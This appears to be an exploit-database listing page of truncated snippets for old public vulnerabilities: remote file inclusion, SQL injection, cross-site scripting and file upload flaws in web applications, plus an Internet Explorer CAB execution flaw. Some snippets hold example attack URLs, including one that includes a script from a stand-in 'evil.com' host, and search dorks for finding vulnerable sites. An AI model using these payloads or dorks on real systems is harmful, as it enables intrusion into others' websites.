Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Squirrelly

CVE-2021-32819 CVE-2021-32819 : SquirrellyJS mixes pure templa...

CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability

No description provided by source. Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& milw0rm.com 2006-12-08...

Magezi Solutions SQL Injection

. . . . | | | / || \ \ | / | | / \ / | / \ / \ / \ / /| |\ \ / \ / \ / / \ / | / \ \ \ | || | / // | | | \ / \ \ | | / | | \ \ / // | \ / | | / |||| /\ | / || / \ / || /|| / \ / / \ | \ || / / / / / / / / / /...

Datacraft Systems SQL Injection

. . . . | | | / || \ \ | / | | / \ / | / \ / \ / \ / /| |\ \ / \ / \ / / \ / | / \ \ \ | || | / // | | | \ / \ \ | | / | | \ \ / // | \ / | | / |||| /\ | / || / \ / || /|| / \ / / \ | \ || / / / / / / / / / /...

K Labs Empowers SQL Injection

. . . . | | | / || \ \ | / | | / \ / | / \ / \ / \ / /| |\ \ / \ / \ / / \ / | / \ \ \ | || | / // | | | \ / \ \ | | / | | \ \ / // | \ / | | / |||| /\ | / || / \ / || /|| / \ / / \ | \ || / / / / / / / / / /...

ACal 2.2.6 Cross Site Scripting

================================================================= =ACal-2.2.6 XSS Vulnerability ================================================================= Exploit Title: ACal-2.2.6 XSS Vulnerability Date: 02.09.2011 Author: T0xic Category: webapps/0day Script url:...

Virtual Consultant SQL Injection

exploit title : Virtual Consultant newsDetail.asp SQL Injection Vulnerability + author : CriminalCoder + category : WebApps + d0rk : inurl:/newsDetail.asp?secID= "Powered By Virtual Consultant" + vendor : www.v-consultant.co.uk/ + myWEB : http://beyz4de.wordpress.com + twitter :...

DMXReady Document Library Manager 1.1 - Contents Change

Title : DMXReady Document Library Manager http://target/path//applications/DocumentLibraryManager/incdocumentlibrarymanager.asp Edit - http://target/path//admin/DocumentLibraryManager/addcategory.asp : milw0rm.com 2009-01-14...

Star Articles 6.0 - Arbitrary File Upload

Star Articles 6.0 - Arbitrary File Upload Star Articles 6.0 Remote File Upload ---------------------------------------------------------- Discovered By: ZoRLu msn: [email protected] Home: www.z0rlu.blogspot.com N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : dork:...

patbb-rfi.txt

Link to download: http://www.php-tools.net/site.php?file=patBBCode/overview.xml Vuln file: examples\patExampleGen\bbcodeSource.php Vuln code: if !isset $GET'example' die 'No example selected.' ; $exampleId = $GET'example'; obstart; // make the example think it's still in the right place chdir '.....

PHPBandManager 0.8 - &#039;index.php?pg&#039; Remote File Inclusion

author:koray greetz:cigicigi.net script:http://sourceforge.net/projects/phpbandmanager allowurlfopen:on or registerglobals:on vuln; /bandmanager/suite/index.php include$GET'pg'.".php"; example; http://www.victim.com/suite/index.php?pg=shell link? milw0rm.com 2007-04-26...

CM68 News &lt;= 12.02.06 &#40;addpth&#41; Remote File Inclusion Vulnerability

Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& milw0rm.com 2006-12-08...

CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================== CM68 News = 12.02.06 addpth Remote File Inclusion Vulnerability ================================================================== Vulnerable Software:cm68news Vulnerable...

QBoard11.txt

free QBoard v1.1 Multiple Remote File include ------------------------------------------------- Discovered By CrAshoVeRrIdE Arabian Security Team ------------------------------------------------- site of script:http://sourceforge.net/projects/freeqboard/...

unsigned.cab.exploit.txt

Vulnerability details and example exploit for Microsoft Active Setup control's unsigned CAB file execution vulnerability. Introduction Microsoft's Active Setup Control asctrls.ocx shipped with Internet Explorer 4 and above has a vulnerability in it as discovered by Juan Carlos Garcia Cuartango ,...